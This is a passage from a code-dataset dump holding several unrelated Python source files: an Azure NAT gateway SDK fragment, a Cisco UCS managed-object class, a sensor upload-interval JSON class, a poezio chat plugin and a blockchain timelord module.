def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.NatGatewayPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_all.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/natGateways'}
def list(
self, resource_group_name, custom_headers=None, raw=False, **operation_config):
"""Gets all nat gateways in a resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of NatGateway
:rtype:
~azure.mgmt.network.v2020_04_01.models.NatGatewayPaged[~azure.mgmt.network.v2020_04_01.models.NatGateway]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.NatGatewayPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/natGateways'}
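# Hedged usage sketch (editor's note, not part of the generated file). It assumes these
# operations are exposed as `client.nat_gateways` on a NetworkManagementClient built for this
# API version; the credential object and resource values below are placeholders.
#
#   client = NetworkManagementClient(credentials, subscription_id)      # assumed entry point
#   poller = client.nat_gateways.create_or_update(
#       "my-resource-group", "my-nat-gateway",
#       {"location": "westus", "sku": {"name": "Standard"}},
#   )
#   nat_gateway = poller.result()            # LROPoller blocks until the PUT completes
#   for gw in client.nat_gateways.list("my-resource-group"):
#       print(gw.name)                       # NatGatewayPaged handles the nextLink paging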
|
py | b4104203755e97799ee7dc2cc8c9044a9ffd2bbd | """This module contains the general information for InitiatorStoreEp ManagedObject."""
import sys, os
from ...ucsmo import ManagedObject
from ...ucscoremeta import UcsVersion, MoPropertyMeta, MoMeta
from ...ucsmeta import VersionMeta
class InitiatorStoreEpConsts():
ID_UNSPECIFIED = "unspecified"
TYPE_DEDICATED = "dedicated"
TYPE_POLICY = "policy"
TYPE_SHARED = "shared"
class InitiatorStoreEp(ManagedObject):
"""This is InitiatorStoreEp class."""
consts = InitiatorStoreEpConsts()
naming_props = set([u'id'])
mo_meta = MoMeta("InitiatorStoreEp", "initiatorStoreEp", "store-[id]", VersionMeta.Version211a, "InputOutput", 0x3f, [], ["read-only"], [u'initiatorGroupEp'], [], [None])
prop_meta = {
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version211a, MoPropertyMeta.INTERNAL, 0x2, None, None, r"""((deleteAll|ignore|deleteNonPresent),){0,2}(deleteAll|ignore|deleteNonPresent){0,1}""", [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x4, 0, 256, None, [], []),
"ep_dn": MoPropertyMeta("ep_dn", "epDn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, 0, 256, None, [], []),
"id": MoPropertyMeta("id", "id", "string", VersionMeta.Version211a, MoPropertyMeta.NAMING, 0x8, None, None, None, ["unspecified"], ["0-4294967295"]),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, 0x10, 0, 256, None, [], []),
"sacl": MoPropertyMeta("sacl", "sacl", "string", VersionMeta.Version302a, MoPropertyMeta.READ_ONLY, None, None, None, r"""((none|del|mod|addchild|cascade),){0,4}(none|del|mod|addchild|cascade){0,1}""", [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version211a, MoPropertyMeta.READ_WRITE, 0x20, None, None, r"""((removed|created|modified|deleted),){0,3}(removed|created|modified|deleted){0,1}""", [], []),
"type": MoPropertyMeta("type", "type", "string", VersionMeta.Version211a, MoPropertyMeta.READ_ONLY, None, None, None, None, ["dedicated", "policy", "shared"], []),
}
prop_map = {
"childAction": "child_action",
"dn": "dn",
"epDn": "ep_dn",
"id": "id",
"rn": "rn",
"sacl": "sacl",
"status": "status",
"type": "type",
}
def __init__(self, parent_mo_or_dn, id, **kwargs):
self._dirty_mask = 0
self.id = id
self.child_action = None
self.ep_dn = None
self.sacl = None
self.status = None
self.type = None
ManagedObject.__init__(self, "InitiatorStoreEp", parent_mo_or_dn, **kwargs)
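# Hedged usage sketch (editor's note, not part of the generated module). The parent dn below is
# made up; the real parent must be an initiatorGroupEp managed object or its dn.
#
#   ep = InitiatorStoreEp(parent_mo_or_dn="org-root/ini-group-example", id="1")
#   print(ep.rn)        # expected "store-1", following the rn pattern "store-[id]" in mo_meta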
|
py | b4104222718d89b6d3dbe13214bcb19b8e40db49 | """
Created on 24 Dec 2018
@author: Bruno Beloff ([email protected])
example:
{"upload": "2018-12-24T13:09:03Z", "rec": "2018-12-24T13:09:01Z", "offset": 2}
"""
from collections import OrderedDict
from scs_core.data.datetime import LocalizedDatetime
from scs_core.data.json import JSONable
from scs_core.data.path_dict import PathDict
from scs_core.data.timedelta import Timedelta
# --------------------------------------------------------------------------------------------------------------------
class UploadInterval(JSONable):
"""
classdocs
"""
UPLOAD_FIELD = 'upload'
REC_FIELD = 'payload.rec'
INCLUDE_MILLIS = False
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct_from_jstr(cls, jstr):
if not jstr:
return None
# document...
document = PathDict.construct_from_jstr(jstr)
if not document:
return None
# upload...
upload_node = document.node(cls.UPLOAD_FIELD)
upload = LocalizedDatetime.construct_from_iso8601(upload_node)
if upload is None:
raise ValueError(upload_node)
# rec...
rec_node = document.node(cls.REC_FIELD)
rec = LocalizedDatetime.construct_from_iso8601(rec_node)
if rec is None:
raise ValueError(rec_node)
# offset...
td = upload - rec
offset = Timedelta(days=td.days, seconds=td.seconds)
return UploadInterval(upload, rec, offset)
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, upload, rec, offset):
"""
Constructor
"""
self.__upload = upload # LocalizedDatetime
self.__rec = rec # LocalizedDatetime
self.__offset = offset # Timedelta
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['upload'] = self.upload.as_iso8601(self.INCLUDE_MILLIS)
jdict['rec'] = self.rec.as_iso8601(self.INCLUDE_MILLIS)
jdict['offset'] = self.offset
return jdict
# ----------------------------------------------------------------------------------------------------------------
@property
def upload(self):
return self.__upload
@property
def rec(self):
return self.__rec
@property
def offset(self):
return self.__offset
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "UploadInterval:{upload:%s, rec:%s, offset:%s}" % (self.upload, self.rec, self.offset)
|
py | b410422f0f864b4819ea4e06d6bd13c0598200e9 | """
Repeats the last message in the conversation.
Command
-------
.. glossary::
/mirror
**Usage:** ``/mirror``
"""
from poezio.plugin import BasePlugin
from poezio import tabs
class Plugin(BasePlugin):
def init(self):
for tab_type in (tabs.MucTab, tabs.PrivateTab, tabs.ConversationTab):
self.api.add_tab_command(tab_type, 'mirror',
handler=self.mirror,
help='Repeat the last message from the conversation.',
short='Repeat the last message from the conversation.')
def mirror(self, args):
messages = self.api.get_conversation_messages()
if not messages:
# Do nothing if the conversation doesn’t contain any message
return
last_message = messages[-1]
self.api.send_message(last_message.txt)
|
py | b410429dc2cf1c0e6932c41df5ccdc56862cf5f0 | import asyncio
import dataclasses
import io
import logging
import random
import time
import traceback
from typing import Callable, Dict, List, Optional, Tuple, Set
from chiavdf import create_discriminant
from thyme.consensus.constants import ConsensusConstants
from thyme.consensus.pot_iterations import calculate_sp_iters, is_overflow_block
from thyme.protocols import timelord_protocol
from thyme.protocols.protocol_message_types import ProtocolMessageTypes
from thyme.server.outbound_message import NodeType, make_msg
from thyme.server.server import ThymeServer
from thyme.timelord.iters_from_block import iters_from_block
from thyme.timelord.timelord_state import LastState
from thyme.timelord.types import Chain, IterationType, StateType
from thyme.types.blockchain_format.classgroup import ClassgroupElement
from thyme.types.blockchain_format.reward_chain_block import RewardChainBlock
from thyme.types.blockchain_format.sized_bytes import bytes32
from thyme.types.blockchain_format.slots import (
ChallengeChainSubSlot,
InfusedChallengeChainSubSlot,
RewardChainSubSlot,
SubSlotProofs,
)
from thyme.types.blockchain_format.sub_epoch_summary import SubEpochSummary
from thyme.types.blockchain_format.vdf import VDFInfo, VDFProof
from thyme.types.end_of_slot_bundle import EndOfSubSlotBundle
from thyme.util.ints import uint8, uint32, uint64, uint128
log = logging.getLogger(__name__)
class Timelord:
def __init__(self, root_path, config: Dict, constants: ConsensusConstants):
self.config = config
self.root_path = root_path
self.constants = constants
self._shut_down = False
self.free_clients: List[Tuple[str, asyncio.StreamReader, asyncio.StreamWriter]] = []
self.potential_free_clients: List = []
self.ip_whitelist = self.config["vdf_clients"]["ip"]
self.server: Optional[ThymeServer] = None
self.chain_type_to_stream: Dict[Chain, Tuple[str, asyncio.StreamReader, asyncio.StreamWriter]] = {}
self.chain_start_time: Dict = {}
# Chains that currently don't have a vdf_client.
self.unspawned_chains: List[Chain] = [
Chain.CHALLENGE_CHAIN,
Chain.REWARD_CHAIN,
Chain.INFUSED_CHALLENGE_CHAIN,
]
# Chains that currently accept iterations.
self.allows_iters: List[Chain] = []
# Last peak received, None if it's already processed.
self.new_peak: Optional[timelord_protocol.NewPeakTimelord] = None
# Last end of subslot bundle, None if we built a peak on top of it.
self.new_subslot_end: Optional[EndOfSubSlotBundle] = None
# Last state received. Can either be a new peak or a new EndOfSubslotBundle.
# Unfinished block info, iters adjusted to the last peak.
self.unfinished_blocks: List[timelord_protocol.NewUnfinishedBlockTimelord] = []
# Signage points iters, adjusted to the last peak.
self.signage_point_iters: List[Tuple[uint64, uint8]] = []
# For each chain, send those info when the process spawns.
self.iters_to_submit: Dict[Chain, List[uint64]] = {}
self.iters_submitted: Dict[Chain, List[uint64]] = {}
self.iters_finished: Set = set()
# For each iteration submitted, know if it's a signage point, an infusion point or an end of slot.
self.iteration_to_proof_type: Dict[uint64, IterationType] = {}
# List of proofs finished.
self.proofs_finished: List[Tuple[Chain, VDFInfo, VDFProof, int]] = []
# Data to send at vdf_client initialization.
self.overflow_blocks: List[timelord_protocol.NewUnfinishedBlockTimelord] = []
        # Incremented each time `_reset_chains` has been called.
        # Used to label proofs in `proofs_finished` so that only proofs corresponding to the most recent state are used.
self.num_resets: int = 0
self.process_communication_tasks: List[asyncio.Task] = []
self.main_loop = None
self.vdf_server = None
self._shut_down = False
self.vdf_failures: List[Tuple[Chain, Optional[int]]] = []
self.vdf_failures_count: int = 0
self.vdf_failure_time: float = 0
self.total_unfinished: int = 0
self.total_infused: int = 0
self.state_changed_callback: Optional[Callable] = None
self.sanitizer_mode = self.config["sanitizer_mode"]
self.pending_bluebox_info: List[timelord_protocol.RequestCompactProofOfTime] = []
self.last_active_time = time.time()
async def _start(self):
self.lock: asyncio.Lock = asyncio.Lock()
self.vdf_server = await asyncio.start_server(
self._handle_client,
self.config["vdf_server"]["host"],
self.config["vdf_server"]["port"],
)
self.last_state: LastState = LastState(self.constants)
if not self.sanitizer_mode:
self.main_loop = asyncio.create_task(self._manage_chains())
else:
self.main_loop = asyncio.create_task(self._manage_discriminant_queue_sanitizer())
log.info("Started timelord.")
def _close(self):
self._shut_down = True
for task in self.process_communication_tasks:
task.cancel()
if self.main_loop is not None:
self.main_loop.cancel()
async def _await_closed(self):
pass
def set_server(self, server: ThymeServer):
self.server = server
async def _handle_client(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter):
async with self.lock:
client_ip = writer.get_extra_info("peername")[0]
log.debug(f"New timelord connection from client: {client_ip}.")
if client_ip in self.ip_whitelist:
self.free_clients.append((client_ip, reader, writer))
log.debug(f"Added new VDF client {client_ip}.")
for ip, end_time in list(self.potential_free_clients):
if ip == client_ip:
self.potential_free_clients.remove((ip, end_time))
break
async def _stop_chain(self, chain: Chain):
try:
while chain not in self.allows_iters:
self.lock.release()
await asyncio.sleep(0.05)
log.error(f"Trying to stop {chain} before its initialization.")
await self.lock.acquire()
if chain not in self.chain_type_to_stream:
log.warning(f"Trying to stop a crashed chain: {chain}.")
return None
stop_ip, _, stop_writer = self.chain_type_to_stream[chain]
self.potential_free_clients.append((stop_ip, time.time()))
stop_writer.write(b"010")
await stop_writer.drain()
if chain in self.allows_iters:
self.allows_iters.remove(chain)
if chain not in self.unspawned_chains:
self.unspawned_chains.append(chain)
if chain in self.chain_type_to_stream:
del self.chain_type_to_stream[chain]
except ConnectionResetError as e:
log.error(f"{e}")
def _can_infuse_unfinished_block(self, block: timelord_protocol.NewUnfinishedBlockTimelord) -> Optional[uint64]:
assert self.last_state is not None
sub_slot_iters = self.last_state.get_sub_slot_iters()
difficulty = self.last_state.get_difficulty()
ip_iters = self.last_state.get_last_ip()
rc_block = block.reward_chain_block
try:
block_sp_iters, block_ip_iters = iters_from_block(
self.constants,
rc_block,
sub_slot_iters,
difficulty,
)
except Exception as e:
log.warning(f"Received invalid unfinished block: {e}.")
return None
block_sp_total_iters = self.last_state.total_iters - ip_iters + block_sp_iters
if is_overflow_block(self.constants, block.reward_chain_block.signage_point_index):
block_sp_total_iters -= self.last_state.get_sub_slot_iters()
found_index = -1
for index, (rc, total_iters) in enumerate(self.last_state.reward_challenge_cache):
if rc == block.rc_prev:
found_index = index
break
if found_index == -1:
log.warning(f"Will not infuse {block.rc_prev} because its reward chain challenge is not in the chain")
return None
new_block_iters = uint64(block_ip_iters - ip_iters)
if len(self.last_state.reward_challenge_cache) > found_index + 1:
if self.last_state.reward_challenge_cache[found_index + 1][1] < block_sp_total_iters:
log.warning(
f"Will not infuse unfinished block {block.rc_prev} sp total iters {block_sp_total_iters}, "
f"because there is another infusion before its SP"
)
return None
if self.last_state.reward_challenge_cache[found_index][1] > block_sp_total_iters:
if not is_overflow_block(self.constants, block.reward_chain_block.signage_point_index):
log.error(
f"Will not infuse unfinished block {block.rc_prev}, sp total iters: {block_sp_total_iters}, "
f"because its iters are too low"
)
return None
if new_block_iters > 0:
return new_block_iters
return None
async def _reset_chains(self, first_run=False, only_eos=False):
# First, stop all chains.
self.last_active_time = time.time()
log.debug("Resetting chains")
ip_iters = self.last_state.get_last_ip()
sub_slot_iters = self.last_state.get_sub_slot_iters()
if not first_run:
for chain in list(self.chain_type_to_stream.keys()):
await self._stop_chain(chain)
# Adjust all signage points iterations to the peak.
iters_per_signage = uint64(sub_slot_iters // self.constants.NUM_SPS_SUB_SLOT)
self.signage_point_iters = [
(k * iters_per_signage - ip_iters, k)
for k in range(1, self.constants.NUM_SPS_SUB_SLOT)
if k * iters_per_signage - ip_iters > 0
]
for sp, k in self.signage_point_iters:
assert k * iters_per_signage > 0
assert k * iters_per_signage < sub_slot_iters
# Adjust all unfinished blocks iterations to the peak.
new_unfinished_blocks = []
self.iters_finished = set()
self.proofs_finished = []
self.num_resets += 1
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN, Chain.INFUSED_CHALLENGE_CHAIN]:
self.iters_to_submit[chain] = []
self.iters_submitted[chain] = []
self.iteration_to_proof_type = {}
if not only_eos:
for block in self.unfinished_blocks + self.overflow_blocks:
new_block_iters: Optional[uint64] = self._can_infuse_unfinished_block(block)
# Does not add duplicates, or blocks that we cannot infuse
if new_block_iters and new_block_iters not in self.iters_to_submit[Chain.CHALLENGE_CHAIN]:
if block not in self.unfinished_blocks:
self.total_unfinished += 1
new_unfinished_blocks.append(block)
for chain in [Chain.REWARD_CHAIN, Chain.CHALLENGE_CHAIN]:
self.iters_to_submit[chain].append(new_block_iters)
if self.last_state.get_deficit() < self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
self.iters_to_submit[Chain.INFUSED_CHALLENGE_CHAIN].append(new_block_iters)
self.iteration_to_proof_type[new_block_iters] = IterationType.INFUSION_POINT
# Remove all unfinished blocks that have already passed.
self.unfinished_blocks = new_unfinished_blocks
# Signage points.
if not only_eos and len(self.signage_point_iters) > 0:
count_signage = 0
for signage, k in self.signage_point_iters:
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN]:
self.iters_to_submit[chain].append(signage)
self.iteration_to_proof_type[signage] = IterationType.SIGNAGE_POINT
count_signage += 1
if count_signage == 3:
break
left_subslot_iters = sub_slot_iters - ip_iters
assert left_subslot_iters > 0
if self.last_state.get_deficit() < self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
self.iters_to_submit[Chain.INFUSED_CHALLENGE_CHAIN].append(left_subslot_iters)
self.iters_to_submit[Chain.CHALLENGE_CHAIN].append(left_subslot_iters)
self.iters_to_submit[Chain.REWARD_CHAIN].append(left_subslot_iters)
self.iteration_to_proof_type[left_subslot_iters] = IterationType.END_OF_SUBSLOT
for chain, iters in self.iters_to_submit.items():
for iteration in iters:
assert iteration > 0
async def _handle_new_peak(self):
assert self.new_peak is not None
self.last_state.set_state(self.new_peak)
if self.total_unfinished > 0:
remove_unfinished = []
for unf_block_timelord in self.unfinished_blocks + self.overflow_blocks:
if (
unf_block_timelord.reward_chain_block.get_hash()
== self.new_peak.reward_chain_block.get_unfinished().get_hash()
):
if unf_block_timelord not in self.unfinished_blocks:
# We never got the EOS for this, but we have the block in overflow list
self.total_unfinished += 1
remove_unfinished.append(unf_block_timelord)
if len(remove_unfinished) > 0:
self.total_infused += 1
for block in remove_unfinished:
if block in self.unfinished_blocks:
self.unfinished_blocks.remove(block)
if block in self.overflow_blocks:
self.overflow_blocks.remove(block)
infusion_rate = round(self.total_infused / self.total_unfinished * 100.0, 2)
log.info(
f"Total unfinished blocks: {self.total_unfinished}. "
f"Total infused blocks: {self.total_infused}. "
f"Infusion rate: {infusion_rate}%."
)
self.new_peak = None
await self._reset_chains()
async def _handle_subslot_end(self):
self.last_state.set_state(self.new_subslot_end)
for block in self.unfinished_blocks:
if self._can_infuse_unfinished_block(block) is not None:
self.total_unfinished += 1
self.new_subslot_end = None
await self._reset_chains()
async def _map_chains_with_vdf_clients(self):
while not self._shut_down:
picked_chain = None
async with self.lock:
if len(self.free_clients) == 0:
break
ip, reader, writer = self.free_clients[0]
for chain_type in self.unspawned_chains:
challenge = self.last_state.get_challenge(chain_type)
initial_form = self.last_state.get_initial_form(chain_type)
if challenge is not None and initial_form is not None:
picked_chain = chain_type
break
if picked_chain is None:
break
picked_chain = self.unspawned_chains[0]
self.chain_type_to_stream[picked_chain] = (ip, reader, writer)
self.free_clients = self.free_clients[1:]
self.unspawned_chains = self.unspawned_chains[1:]
self.chain_start_time[picked_chain] = time.time()
log.debug(f"Mapping free vdf_client with chain: {picked_chain}.")
self.process_communication_tasks.append(
asyncio.create_task(
self._do_process_communication(
picked_chain, challenge, initial_form, ip, reader, writer, proof_label=self.num_resets
)
)
)
async def _submit_iterations(self):
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN, Chain.INFUSED_CHALLENGE_CHAIN]:
if chain in self.allows_iters:
_, _, writer = self.chain_type_to_stream[chain]
for iteration in self.iters_to_submit[chain]:
if iteration in self.iters_submitted[chain]:
continue
log.debug(f"Submitting iterations to {chain}: {iteration}")
assert iteration > 0
prefix = str(len(str(iteration)))
if len(str(iteration)) < 10:
prefix = "0" + prefix
iter_str = prefix + str(iteration)
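                    # Wire format note: e.g. iteration=1234567 -> prefix "07" -> b"071234567",
                    # i.e. a two-character zero-padded digit count followed by the decimal iteration count.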
writer.write(iter_str.encode())
await writer.drain()
self.iters_submitted[chain].append(iteration)
def _clear_proof_list(self, iters: uint64):
return [
(chain, info, proof, label)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations != iters
]
async def _check_for_new_sp(self, iter_to_look_for: uint64):
signage_iters = [
iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.SIGNAGE_POINT
]
if len(signage_iters) == 0:
return None
to_remove = []
for potential_sp_iters, signage_point_index in self.signage_point_iters:
if potential_sp_iters not in signage_iters or potential_sp_iters != iter_to_look_for:
continue
signage_iter = potential_sp_iters
proofs_with_iter = [
(chain, info, proof)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations == signage_iter and label == self.num_resets
]
# Wait for both cc and rc to have the signage point.
if len(proofs_with_iter) == 2:
cc_info: Optional[VDFInfo] = None
cc_proof: Optional[VDFProof] = None
rc_info: Optional[VDFInfo] = None
rc_proof: Optional[VDFProof] = None
for chain, info, proof in proofs_with_iter:
if chain == Chain.CHALLENGE_CHAIN:
cc_info = info
cc_proof = proof
if chain == Chain.REWARD_CHAIN:
rc_info = info
rc_proof = proof
if cc_info is None or cc_proof is None or rc_info is None or rc_proof is None:
log.error(f"Insufficient signage point data {signage_iter}")
continue
self.iters_finished.add(iter_to_look_for)
self.last_active_time = time.time()
rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
if rc_info.challenge != rc_challenge:
assert rc_challenge is not None
log.warning(f"SP: Do not have correct challenge {rc_challenge.hex()}" f" has {rc_info.challenge}")
# This proof is on an outdated challenge, so don't use it
continue
iters_from_sub_slot_start = cc_info.number_of_iterations + self.last_state.get_last_ip()
response = timelord_protocol.NewSignagePointVDF(
signage_point_index,
dataclasses.replace(cc_info, number_of_iterations=iters_from_sub_slot_start),
cc_proof,
rc_info,
rc_proof,
)
if self.server is not None:
msg = make_msg(ProtocolMessageTypes.new_signage_point_vdf, response)
await self.server.send_to_all([msg], NodeType.FULL_NODE)
# Cleanup the signage point from memory.
to_remove.append((signage_iter, signage_point_index))
self.proofs_finished = self._clear_proof_list(signage_iter)
# Send the next 3 signage point to the chains.
next_iters_count = 0
for next_sp, k in self.signage_point_iters:
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN]:
if next_sp not in self.iters_submitted[chain] and next_sp not in self.iters_to_submit[chain]:
self.iters_to_submit[chain].append(next_sp)
self.iteration_to_proof_type[next_sp] = IterationType.SIGNAGE_POINT
next_iters_count += 1
if next_iters_count == 3:
break
# Break so we alternate between checking SP and IP
break
for r in to_remove:
self.signage_point_iters.remove(r)
async def _check_for_new_ip(self, iter_to_look_for: uint64):
if len(self.unfinished_blocks) == 0:
return None
infusion_iters = [
iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.INFUSION_POINT
]
for iteration in infusion_iters:
if iteration != iter_to_look_for:
continue
proofs_with_iter = [
(chain, info, proof)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations == iteration and label == self.num_resets
]
if self.last_state.get_challenge(Chain.INFUSED_CHALLENGE_CHAIN) is not None:
chain_count = 3
else:
chain_count = 2
if len(proofs_with_iter) == chain_count:
block = None
ip_iters = None
for unfinished_block in self.unfinished_blocks:
try:
_, ip_iters = iters_from_block(
self.constants,
unfinished_block.reward_chain_block,
self.last_state.get_sub_slot_iters(),
self.last_state.get_difficulty(),
)
except Exception as e:
log.error(f"Error {e}")
continue
if ip_iters - self.last_state.get_last_ip() == iteration:
block = unfinished_block
break
assert ip_iters is not None
if block is not None:
ip_total_iters = self.last_state.get_total_iters() + iteration
challenge = block.reward_chain_block.get_hash()
icc_info: Optional[VDFInfo] = None
icc_proof: Optional[VDFProof] = None
cc_info: Optional[VDFInfo] = None
cc_proof: Optional[VDFProof] = None
rc_info: Optional[VDFInfo] = None
rc_proof: Optional[VDFProof] = None
for chain, info, proof in proofs_with_iter:
if chain == Chain.CHALLENGE_CHAIN:
cc_info = info
cc_proof = proof
if chain == Chain.REWARD_CHAIN:
rc_info = info
rc_proof = proof
if chain == Chain.INFUSED_CHALLENGE_CHAIN:
icc_info = info
icc_proof = proof
if cc_info is None or cc_proof is None or rc_info is None or rc_proof is None:
log.error(f"Insufficient VDF proofs for infusion point ch: {challenge} iterations:{iteration}")
return None
rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
if rc_info.challenge != rc_challenge:
assert rc_challenge is not None
log.warning(
f"Do not have correct challenge {rc_challenge.hex()} "
f"has {rc_info.challenge}, partial hash {block.reward_chain_block.get_hash()}"
)
# This proof is on an outdated challenge, so don't use it
continue
self.iters_finished.add(iter_to_look_for)
self.last_active_time = time.time()
log.debug(f"Generated infusion point for challenge: {challenge} iterations: {iteration}.")
overflow = is_overflow_block(self.constants, block.reward_chain_block.signage_point_index)
if not self.last_state.can_infuse_block(overflow):
log.warning("Too many blocks, or overflow in new epoch, cannot infuse, discarding")
return None
cc_info = dataclasses.replace(cc_info, number_of_iterations=ip_iters)
response = timelord_protocol.NewInfusionPointVDF(
challenge,
cc_info,
cc_proof,
rc_info,
rc_proof,
icc_info,
icc_proof,
)
msg = make_msg(ProtocolMessageTypes.new_infusion_point_vdf, response)
if self.server is not None:
await self.server.send_to_all([msg], NodeType.FULL_NODE)
self.proofs_finished = self._clear_proof_list(iteration)
if (
self.last_state.get_last_block_total_iters() is None
and not self.last_state.state_type == StateType.FIRST_SUB_SLOT
):
# We don't know when the last block was, so we can't make peaks
return None
sp_total_iters = (
ip_total_iters
- ip_iters
+ calculate_sp_iters(
self.constants,
block.sub_slot_iters,
block.reward_chain_block.signage_point_index,
)
- (block.sub_slot_iters if overflow else 0)
)
if self.last_state.state_type == StateType.FIRST_SUB_SLOT:
is_transaction_block = True
height: uint32 = uint32(0)
else:
last_block_ti = self.last_state.get_last_block_total_iters()
assert last_block_ti is not None
is_transaction_block = last_block_ti < sp_total_iters
height = uint32(self.last_state.get_height() + 1)
if height < 5:
# Don't directly update our state for the first few blocks, because we cannot validate
# whether the pre-farm is correct
return None
new_reward_chain_block = RewardChainBlock(
uint128(self.last_state.get_weight() + block.difficulty),
height,
uint128(ip_total_iters),
block.reward_chain_block.signage_point_index,
block.reward_chain_block.pos_ss_cc_challenge_hash,
block.reward_chain_block.proof_of_space,
block.reward_chain_block.challenge_chain_sp_vdf,
block.reward_chain_block.challenge_chain_sp_signature,
cc_info,
block.reward_chain_block.reward_chain_sp_vdf,
block.reward_chain_block.reward_chain_sp_signature,
rc_info,
icc_info,
is_transaction_block,
)
if self.last_state.state_type == StateType.FIRST_SUB_SLOT:
# Genesis
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1
elif overflow and self.last_state.deficit == self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
if self.last_state.peak is not None:
assert self.last_state.subslot_end is None
# This means the previous block is also an overflow block, and did not manage
# to lower the deficit, therefore we cannot lower it either. (new slot)
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
else:
# This means we are the first infusion in this sub-slot. This may be a new slot or not.
assert self.last_state.subslot_end is not None
if self.last_state.subslot_end.infused_challenge_chain is None:
# There is no ICC, which means we are not finishing a slot. We can reduce the deficit.
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1
else:
# There is an ICC, which means we are finishing a slot. Different slot, so can't change
# the deficit
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
else:
new_deficit = max(self.last_state.deficit - 1, 0)
if new_deficit == self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1:
last_csb_or_eos = ip_total_iters
else:
last_csb_or_eos = self.last_state.last_challenge_sb_or_eos_total_iters
if self.last_state.just_infused_sub_epoch_summary():
new_sub_epoch_summary = None
passed_ses_height_but_not_yet_included = False
else:
new_sub_epoch_summary = block.sub_epoch_summary
if new_reward_chain_block.height % self.constants.SUB_EPOCH_BLOCKS == 0:
passed_ses_height_but_not_yet_included = True
else:
passed_ses_height_but_not_yet_included = (
self.last_state.get_passed_ses_height_but_not_yet_included()
)
self.new_peak = timelord_protocol.NewPeakTimelord(
new_reward_chain_block,
block.difficulty,
uint8(new_deficit),
block.sub_slot_iters,
new_sub_epoch_summary,
self.last_state.reward_challenge_cache,
uint128(last_csb_or_eos),
passed_ses_height_but_not_yet_included,
)
await self._handle_new_peak()
# Break so we alternate between checking SP and IP
break
async def _check_for_end_of_subslot(self, iter_to_look_for: uint64):
left_subslot_iters = [
iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.END_OF_SUBSLOT
]
if len(left_subslot_iters) == 0:
return None
if left_subslot_iters[0] != iter_to_look_for:
return None
chains_finished = [
(chain, info, proof)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations == left_subslot_iters[0] and label == self.num_resets
]
if self.last_state.get_challenge(Chain.INFUSED_CHALLENGE_CHAIN) is not None:
chain_count = 3
else:
chain_count = 2
if len(chains_finished) == chain_count:
icc_ip_vdf: Optional[VDFInfo] = None
icc_ip_proof: Optional[VDFProof] = None
cc_vdf: Optional[VDFInfo] = None
cc_proof: Optional[VDFProof] = None
rc_vdf: Optional[VDFInfo] = None
rc_proof: Optional[VDFProof] = None
for chain, info, proof in chains_finished:
